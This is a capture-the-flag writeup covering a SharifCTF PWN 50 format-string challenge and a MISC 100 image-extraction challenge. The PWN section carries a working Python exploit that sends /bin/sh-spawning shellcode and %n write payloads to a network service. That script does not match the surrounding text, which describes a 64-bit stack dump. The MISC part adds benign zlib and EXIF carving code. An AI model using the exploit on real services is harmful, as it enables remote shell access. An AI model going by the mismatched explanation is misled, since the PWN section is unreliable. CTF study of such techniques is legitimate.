Sharifctf




Sharifctf Writeup


Guess [PWN 50]

It had a format string vulnerability, and we had to dump the whole stack and find the flag in it, so I wrote a brute-force script in Python using direct parameter access.
But the twist here is that it is a 64-bit binary, so you have to use $lx instead of $x.

    from pwn import *

    shellcode="\x90"*10+"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"+"\x90"*10
    i=8
    while True:
        try:
            num = 0xccec+i
            num1= num - 78
            num2 = 0xffff - num
            r=remote('localhost',56032)
            #r=remote('challenge02.root-me.org',56032)
            payload = pack(0x0804a04c)+pack(0x0804a04e)+shellcode+"%"+str(num1)+"u"+"%5$n"+"%"+str(num2)+"u"+"%6$n"
            print payload
            r.sendline(payload)
            #r.interactive()
            msg=r.recv(1024,timeout = 10)
            print msg
        except EOFError :
            print "[+] No shell!"
            print "[+]i="+str(i)
        i=i+1

MISC 100

Basically, it had a binary which, when run, displays an image. Our aim is to find the camera model of that image, but how do we extract it?
I analysed it using Binwalk, but it showed only ELF and zlib data... but it fooled me: if you extract it using the -e option in binwalk, you get the image.
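
What the -e extraction does for this challenge can be reproduced by hand: find the zlib stream inside the ELF, inflate it, and read the camera model from the image's EXIF block. The Python 3 code below is an added example, not part of the original writeup; it assumes the image sits inside the zlib data and stores the model in the standard EXIF Model tag, and the function names and the sample blob (built in build_sample) are constructed for illustration.

```python
import struct
import zlib

def carve_zlib(blob):
    """Yield (offset, inflated bytes) for each plausible zlib stream in blob."""
    for off in range(len(blob) - 1):
        # RFC 1950: CMF 0x78 (deflate, 32K window), CMF*256+FLG divisible by 31
        if blob[off] == 0x78 and ((blob[off] << 8) | blob[off + 1]) % 31 == 0:
            try:
                yield off, zlib.decompressobj().decompress(blob[off:])
            except zlib.error:
                continue  # header bytes matched by chance

def exif_model(image):
    """Return the EXIF Model string (IFD0 tag 0x0110), or None if absent."""
    start = image.find(b"Exif\x00\x00")
    tiff = image[start + 6:]
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if start < 0 or endian is None:
        return None
    try:
        (ifd,) = struct.unpack_from(endian + "I", tiff, 4)
        (count,) = struct.unpack_from(endian + "H", tiff, ifd)
        for n in range(count):
            tag, typ, size, value = struct.unpack_from(endian + "HHI4s", tiff, ifd + 2 + 12 * n)
            if tag == 0x0110 and typ == 2:  # type 2 = ASCII
                if size > 4:  # value field holds an offset into the TIFF block
                    ptr = struct.unpack(endian + "I", value)[0]
                    value = tiff[ptr:ptr + size]
                return value[:size].rstrip(b"\x00").decode("ascii", "replace")
    except struct.error:
        pass  # truncated or malformed EXIF
    return None

def find_camera_model(blob):
    for off, data in carve_zlib(blob):
        model = exif_model(data)
        if model:
            return off, model
    return None

def build_sample():
    """Constructed input: fake ELF bytes, then zlib(JPEG stub with EXIF Model)."""
    model = b"ExampleCam 100\x00"
    tiff = b"II*\x00" + struct.pack("<IH", 8, 1)  # TIFF header, IFD0 with 1 entry
    tiff += struct.pack("<HHIII", 0x0110, 2, len(model), 26, 0) + model
    app1 = b"Exif\x00\x00" + tiff
    jpeg = b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
    return b"\x7fELF" + b"\x00" * 60 + zlib.compress(jpeg) + b"\x00" * 16
```

On a real file, pass the binary's bytes to find_camera_model instead of build_sample(); the returned offset should match the zlib offset binwalk reports.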